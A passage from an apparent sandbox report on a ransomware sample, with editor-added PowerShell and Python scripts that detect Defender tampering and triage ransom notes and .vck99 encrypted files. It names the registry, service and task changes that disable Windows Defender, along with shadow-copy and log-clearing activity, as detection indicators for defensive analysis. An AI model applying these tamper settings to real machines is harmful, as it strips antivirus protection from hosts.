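        DisableOnAccessProtection   = 1
        DisableRealtimeMonitoring   = 1
        DisableScanOnRealtimeEnable = 1
    }
    "$PolicyRoot\SpyNet"   = @{ DisableBlockAtFirstSeen = 1; SpynetReporting = 0; SubmitSamplesConsent = 0 }
    "$PolicyRoot\MpEngine" = @{ MpEnablePus = 0 }
}
$DefenderServices  = 'WinDefend', 'WdFilter', 'WdBoot', 'WdNisDrv', 'WdNisSvc', 'SecurityHealthService'  # Start=4 is disabled
$DefenderLoggers   = 'DefenderApiLogger', 'DefenderAuditLogger'                                         # Start=0 is session off
$DefenderTaskPaths = '\Microsoft\Windows\Windows Defender\', '\Microsoft\Windows\ExploitGuard\'

function Get-RegValue([string]$Path, [string]$Name) {
    # $null when either the key or the value is absent
    if (-not (Test-Path -LiteralPath $Path)) { return $null }
    $item = Get-ItemProperty -LiteralPath $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Test-DefenderTamper {
    $findings = New-Object System.Collections.Generic.List[object]

    foreach ($key in $TamperedPolicy.Keys) {
        foreach ($name in $TamperedPolicy[$key].Keys) {
            $actual = Get-RegValue -Path $key -Name $name
            if ($null -ne $actual -and $actual -eq $TamperedPolicy[$key][$name]) {
                $findings.Add([pscustomobject]@{ Kind = 'Policy'; Item = "$key\$name"; Value = $actual })
            }
        }
    }
    foreach ($svc in $DefenderServices) {
        if ((Get-RegValue -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$svc" -Name 'Start') -eq 4) {
            $findings.Add([pscustomobject]@{ Kind = 'Service'; Item = $svc; Value = 'Start=4 (disabled)' })
        }
    }
    foreach ($logger in $DefenderLoggers) {
        if ((Get-RegValue -Path "HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Autologger\$logger" -Name 'Start') -eq 0) {
            $findings.Add([pscustomobject]@{ Kind = 'Autologger'; Item = $logger; Value = 'Start=0 (off)' })
        }
    }
    foreach ($path in $DefenderTaskPaths) {
        Get-ScheduledTask -TaskPath $path -ErrorAction SilentlyContinue |
            Where-Object State -eq 'Disabled' |
            ForEach-Object { $findings.Add([pscustomobject]@{ Kind = 'Task'; Item = $_.TaskPath + $_.TaskName; Value = 'Disabled' }) }
    }
    return ,$findings
}

$tamper = Test-DefenderTamper
if ($tamper.Count -eq 0) { 'No Defender tamper indicators from this report found.' }
else { $tamper | Format-Table -AutoSize }

# The engine's own view.  With Tamper Protection on, several of the writes above
# are ignored, so the registry can read "tampered" while protection still runs.
Get-MpComputerStatus -ErrorAction SilentlyContinue |
    Select-Object AMServiceEnabled, RealTimeProtectionEnabled, IsTamperProtected, AntivirusSignatureVersion
```

Read the two outputs together: a policy value of 1 with RealTimeProtectionEnabled still True means Tamper Protection absorbed the write; a Start=4 on WinDefend with AMServiceEnabled False means it did not, and the host needs the service re-enabled and a fresh definition set, since the sample also runs MpCmdRun -RemoveDefinitions -All.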

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Internet Explorer\it-IT\ieinstal.exe.mui C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Trial-pl.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_pcghlVrN2Ww0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_KMS_Client-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_dL7PZh3_fXw0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Lighting\Dark\Sunset.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteSmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL__-uasMCwfIk0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-white_scale-100.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.strings.psd1.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_uTxmmQZZhek0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Gdd7-K-qt-A0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-100_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Lumia.AppTk.NativeDirect3d.UAP\Native3d.TextureRendererVertexShader.cso C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-72_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\de-DE\MSFT_PackageManagementSource.strings.psd1.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_3x3_1cL1yo40.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\2876_20x20x32.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\Retail\Retail_Feedback_icon.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-36_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\ui-strings.js.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Sxy_b5kzBu00.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Q8H6b2FOVPI0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SmallTile.scale-200_contrast-white.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\TimerWideTile.contrast-black_scale-100.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-black\LargeTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Yf7e_p87DFI0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\nub.png.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_dKFr-KM-D5s0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_8B1_Sepony80.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\OperationValidationResources.psd1 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\PhotosSmallTile.contrast-white_scale-100.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\5px.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-36_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeMediumTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\ui-strings.js.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_qRox--hM9fM0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL120.XML.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_-HAMpoQ_SmY0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteWideTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\WINGDNG2.TTF.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_xrwb8q1Hfws0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-36_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_g2yrrQJPhUk0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Config\ShellPreviewConfig.json C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe\Assets\GameBar_AppList.targetsize-48_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_anonymoususer_18.svg.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_H1LmB3GTWWo0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.excelmui.msi.16.en-us.xml.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_cRrzThFP5DI0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubStoreLogo.scale-125_contrast-high.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\199.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-36_contrast-black.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsStoreLogo.scale-100.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookWideTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\as80.xsl.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_Z5Z5JBCwLCA0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\SmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-64_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase\Controls\Xbox360PurchaseHostPage.html C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\ThirdPartyNotices.txt.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_2Ze_Hfkbkeo0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-80_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Common Files\Services\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_selected_18.svg.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_GpjOaVZxo2E0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_upi0tBIsSag0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
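
Two file-name artifacts recur through the table above: the ransom note phLK_HOW_TO_DECRYPT.txt dropped into every directory the sample touches, and encrypted files renamed to their original name plus a 56-character URL-safe-base64 token plus .vck99, where the first 44 characters of the token are identical for every file in this run and the last 12 differ per file. The script below is an added example by the editor, not part of the sandbox report: it triages a file listing into notes, encrypted files and untouched files, recovers the original names, and measures which part of the token is constant across the run rather than assuming it. The sample paths are copied from the table; the 40-character minimum token length and the general note-name prefix are assumptions, and the report does not say what the token encodes.

```python
"""Triage a file listing for the Hive artifacts this report shows: ransom
notes named *_HOW_TO_DECRYPT.txt and encrypted files whose names end in a
long URL-safe-base64 token plus a short extension (.vck99 in this run).

Added example by the editor, not part of the sandbox report.  The 40-char
minimum token length is an assumption; the script only measures which part
of the token is constant across the run, it does not claim what it encodes.
"""
import os
import re
from os.path import commonprefix

NOTE_RE = re.compile(r'^[A-Za-z0-9]+_HOW_TO_DECRYPT\.txt$')        # this run's note is phLK_HOW_TO_DECRYPT.txt
# <original name>.<token of URL-safe base64 chars>.<short extension>
ENC_RE = re.compile(r'^(?P<orig>.+?)\.(?P<token>[A-Za-z0-9_-]{40,})\.(?P<ext>[a-z0-9]{3,8})$')

# Copied from the 'Drops file in Program Files directory' table: six encrypted
# files, two ransom notes, two files the sample opened but had not renamed.
SAMPLE_PATHS = [
    r"C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Trial-pl.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_pcghlVrN2Ww0.vck99",
    r"C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_KMS_Client-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_dL7PZh3_fXw0.vck99",
    r"C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-ppd.xrm-ms.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL__-uasMCwfIk0.vck99",
    r"C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.strings.psd1.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_uTxmmQZZhek0.vck99",
    r"C:\Program Files\Microsoft Office\root\vfs\Fonts\private\WINGDNG2.TTF.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_xrwb8q1Hfws0.vck99",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp.MlpTf-Xi8ftPUdYphuklM0r8MH_Q5-US-r19IvPVLkL_g2yrrQJPhUk0.vck99",
    r"C:\Program Files (x86)\Common Files\Services\phLK_HOW_TO_DECRYPT.txt",
    r"C:\Program Files\phLK_HOW_TO_DECRYPT.txt",
    r"C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml",
    r"C:\Program Files\Internet Explorer\it-IT\ieinstal.exe.mui",
]


def classify_path(path):
    """Return (kind, name, token, ext); kind is 'note', 'encrypted' or 'untouched'.

    For an encrypted file, name is the original file name with the suffix stripped.
    """
    name = os.path.basename(path.replace("\\", "/"))   # Windows paths on any host
    if NOTE_RE.match(name):
        return "note", name, None, None
    m = ENC_RE.match(name)
    if m:
        return "encrypted", m.group("orig"), m.group("token"), m.group("ext")
    return "untouched", name, None, None


def triage(paths):
    """Group paths and split the encrypted-file token into run-wide and per-file parts."""
    notes, originals, tokens, extensions, untouched = [], [], [], set(), []
    for p in paths:
        kind, name, token, ext = classify_path(p)
        if kind == "note":
            notes.append(name)
        elif kind == "encrypted":
            originals.append(name)
            tokens.append(token)
            extensions.add(ext)
        else:
            untouched.append(name)
    # The shared prefix only means something with more than one sample.
    run_token = commonprefix(tokens) if len(tokens) > 1 else ""
    return {
        "notes": len(notes), "encrypted": len(originals), "untouched": len(untouched),
        "note_names": sorted(set(notes)),
        "extensions": sorted(extensions),
        "run_token": run_token,
        "per_file_tokens": [t[len(run_token):] for t in tokens],
        "originals": originals,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_PATHS)
    for k, v in result.items():
        print(f"{k}: {v}")
```

Fed a full disk listing from a victim host, the run_token value is the string to pivot on across the estate: if other hosts show a different 44-character prefix, they were hit with different key material and a single decryptor will not cover them. The untouched bucket is also worth a look: files the report shows as "opened for modification" but not yet renamed are the ones the sample was working on when the sandbox timed out.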

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
